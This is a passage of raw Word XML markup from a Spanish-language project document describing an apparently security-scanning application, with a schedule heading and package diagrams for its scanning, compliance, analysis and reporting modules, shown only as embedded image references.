            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1738BECE" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00F41898" w:rsidRDefault="0030013F" w:rsidP="00915A16">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41898">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Credenciales de prueba para la aplicación.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0030013F" w:rsidRPr="001D1995" w14:paraId="78AEF71D" w14:textId="77777777" w:rsidTr="00915A16">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="563206CA" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00F41898" w:rsidRDefault="0030013F" w:rsidP="00915A16">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41898">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:t>Otros</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5342" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="583B5EC1" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00F41898" w:rsidRDefault="0030013F" w:rsidP="00915A16">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41898">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Red segura de acceso a internet.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B4B0E0A" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3966953D" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F780586" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A78C0A5" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.7. Cronograma</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7583410C" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1930614A" wp14:editId="701113DE">
            <wp:extent cx="5943600" cy="2950210"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="831589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476351A9" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>2. Analisis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4840943D" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>2.1. Identificación de Paquetes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7083CBD0" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Módulo de Escaneo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2EDABC" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A34307F" wp14:editId="1F3553ED">
            <wp:extent cx="3036974" cy="1355834"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1806956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5929" cy="1368761"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8A0EA1" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Módulo de Cumplimiento</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5FF009" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BE17221" wp14:editId="72E43D51">
            <wp:extent cx="3036711" cy="1463040"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="9968749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478" cy="1482199"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11884FEE" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="356F1BF4" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Modulo de Analisis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029025DA" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39114AC1" wp14:editId="676DB18B">
            <wp:extent cx="2991394" cy="1418590"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1376632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869" cy="1430671"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F08D73C" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Modulo de Reportes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41361E19" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7640FCC1" wp14:editId="362D8175">
            <wp:extent cx="3017520" cy="1436914"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11677145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4459" cy="1449742"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="542D74E1" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>2.2. Vista de Paquetes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE9C6BC" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Vista modulo de Escaneo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197A02D3" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0ACC3D66" wp14:editId="585C2800">
            <wp:extent cx="3498927" cy="1387366"/>
            <wp:effectExtent l="0" t="0" r="6350" b="3810"/>
            <wp:docPr id="20657924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5284" cy="1397817"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CB1B1C" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vista modulo de Cumplimineto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DC05CC" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62777FCF" wp14:editId="1D6F130D">
            <wp:extent cx="3498850" cy="1450428"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="17747519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1660" cy="1459884"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD72A10" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Vista modulo de Analisis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7275A889" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="493A8DF3" wp14:editId="66646DE7">
            <wp:extent cx="3846786" cy="1639570"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="14966679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6878" cy="1648134"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CF925F" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vista modulo de reports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042F1112" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35D933D3" wp14:editId="68A5F79F">
            <wp:extent cx="3845709" cy="1671144"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="3994098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8557" cy="1681073"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FCE8AE" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A202180" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F2DC72E" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B8CE3DE" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62BB0E69" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47C07C5A" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FBCCF1E" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="747524E2" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3378DBEF" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D2765FE" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D89B333" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CAE88C1" w14:textId="2B808C0E" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.3. Analisis de Paquetes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC103D7" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42198406" wp14:editId="67EABE48">
            <wp:extent cx="4663651" cy="3563007"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="2722614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630" cy="3598899"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBD43FD" w14:textId="6DDBD9B6" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="263C0A17" w14:textId="685BC847" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="241F4747" w14:textId="5EFE2F74" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="586F6BFA" w14:textId="458E32CE" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B3FF2A2" w14:textId="5F4C1CF9" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06005A7F" w14:textId="569C6C0A" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49E9946C" w14:textId="20EFD671" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C027369" w14:textId="75124C1F" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59FF3E51" w14:textId="30068969" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05D24EC6" w14:textId="7024BC4C" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C589C8E" w14:textId="7E7AD19E" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48C89907" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
